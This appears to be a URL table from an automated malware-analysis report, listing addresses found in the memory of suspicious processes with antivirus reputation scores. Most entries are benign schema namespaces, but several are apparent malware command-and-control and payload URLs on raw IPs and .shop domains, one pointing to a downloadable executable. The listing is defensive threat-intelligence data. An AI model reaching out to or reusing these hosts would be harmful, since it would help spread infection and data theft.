http://tempuri.org/Entity/Id2Response	1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A3D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A0C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002F87000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002D5D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000003031000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002851000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002F38000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002DAE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A6E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002BC5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000028E3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B63000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002D1D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002BF6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B32000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000029DB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.000000000297A000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id21Response	1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A3D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A0C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002F87000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002D5D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000003031000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002851000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002F38000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002DAE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A6E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002BC5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000028E3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B63000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002D1D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002BF6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B32000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000029DB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.000000000297A000.00000004.00000800.00020000.00000000.sdmp	false	4%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap	1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://77.91.77.81/Kiru9gu/index.phpe	axplong.exe, 0000000A.00000002.3793682426.0000000001164000.00000004.00000020.00020000.00000000.sdmp	false	17%, Virustotal, Browse Avira URL Cloud: phishing	unknown
http://77.91.77.81/lend/123.exed4	axplong.exe, 0000000A.00000002.3793682426.0000000001164000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID	1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://65.21.175.0/108e010e8f91c38c.phpWC	aspnet_regiis.exe, 00000036.00000003.2040109311.00000000030FD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://tempuri.org/Entity/Id13LR	RegAsm.exe, 0000000D.00000002.3821279083.0000000002F87000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002D5D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000003031000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002F38000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002DAE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002EE9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002FE3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002DFD000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://65.21.175.0/b13597c85f807692/msvcp140.dllEM	aspnet_regiis.exe, 00000036.00000002.2125675597.0000000003057000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence	1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002851000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id5LR	RegAsm.exe, 0000000D.00000002.3821279083.0000000002F87000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002D5D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000003031000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002F38000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002DAE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002EE9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002FE3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002DFD000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/fault	1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat	1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://iplogger.co/1lLub-&	1Vkf7silOj.exe, 00000001.00000002.1597298583.0000000005E3E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://Passport.NET/tb_	svchost.exe, 00000011.00000002.3795315046.000001496FA53000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLK	aspnet_regiis.exe, 00000036.00000003.2103386147.000000002347E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey	1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.ip.sb/ip	Explorers.exe, 0000002A.00000002.1954319592.0000000002671000.00000004.00000800.00020000.00000000.sdmp, 1Vkf7silOj.exe, svhosts.exe.37.dr, 123.exe.10.dr	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsenfo	svchost.exe, 00000011.00000003.1777703648.000001496F574000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://facilitycoursedw.shop/apii	6.exe, 00000008.00000002.1556968219.0000000001812000.00000004.00000020.00020000.00000000.sdmp	false	9%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://185.172.128.116/Mb3GvQs8/index.phpFa	Hkbsse.exe, 00000013.00000002.3791168067.000000000153B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://crl.ver)	svchost.exe, 00000006.00000002.3154903535.00000200BEC00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3791446115.000001496ECA4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1	1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id24Response	1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A3D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A0C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002F87000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002D5D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000003031000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002851000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002F38000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002DAE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A6E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002BC5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000028E3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B63000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002D1D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002BF6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B32000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000029DB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.000000000297A000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	aspnet_regiis.exe, 00000036.00000003.2023992732.0000000023238000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://77.91.77.81/Kiru9gu/index.phptch	axplong.exe, 0000000A.00000002.3793682426.0000000001164000.00000004.00000020.00020000.00000000.sdmp	false	4%, Virustotal, Browse Avira URL Cloud: phishing	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego	1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id14LR	RegAsm.exe, 0000000D.00000002.3821279083.0000000002F87000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002D5D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000003031000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002F38000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002DAE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002EE9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002FE3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002DFD000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id6LR	RegAsm.exe, 0000000D.00000002.3821279083.0000000002F87000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002D5D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000003031000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002F38000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002DAE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002EE9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002FE3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002DFD000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing	1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002851000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdes	svchost.exe, 00000011.00000003.1952028774.000001496F56D000.00000004.00000020.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://doughtdrillyksow.shop/	6.exe, 00000008.00000002.1556968219.0000000001812000.00000004.00000020.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://tempuri.org/Entity/Id10ResponseD	1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000003179000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse	1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://bargainnygroandjwk.shop/	6.exe, 00000008.00000002.1557023202.000000000182E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/faultH	RegAsm.exe, 0000000D.00000002.3821279083.0000000002851000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id5Response	1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A3D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A0C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002F87000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002D5D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000003031000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002851000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002F38000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002DAE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A6E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002BC5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000028E3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B63000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002D1D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002BF6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B32000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000029DB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.000000000297A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id15ResponseD	1Vkf7silOj.exe, 00000001.00000002.1586636370.00000000031A4000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.172.128.116/erences.SourceAumid	Hkbsse.exe, 00000013.00000002.3791168067.000000000153B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://tempuri.org/Entity/Id10Response	1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A3D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A0C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002F87000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002D5D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000003031000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002851000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002F38000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002DAE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A6E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002BC5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000028E3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B63000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002D1D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002BF6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B32000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000029DB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.000000000297A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://moreapp4you.online	1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000003355000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id8Response	1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A3D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A0C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002F87000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002D5D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000003031000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002851000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002F38000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002DAE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A6E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002BC5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000028E3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B63000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002D1D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002BF6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B32000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000029DB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.000000000297A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id22LR	RegAsm.exe, 0000000D.00000002.3821279083.0000000002F87000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002D5D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000003031000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002F38000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002DAE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002EE9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002FE3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002DFD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID	1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
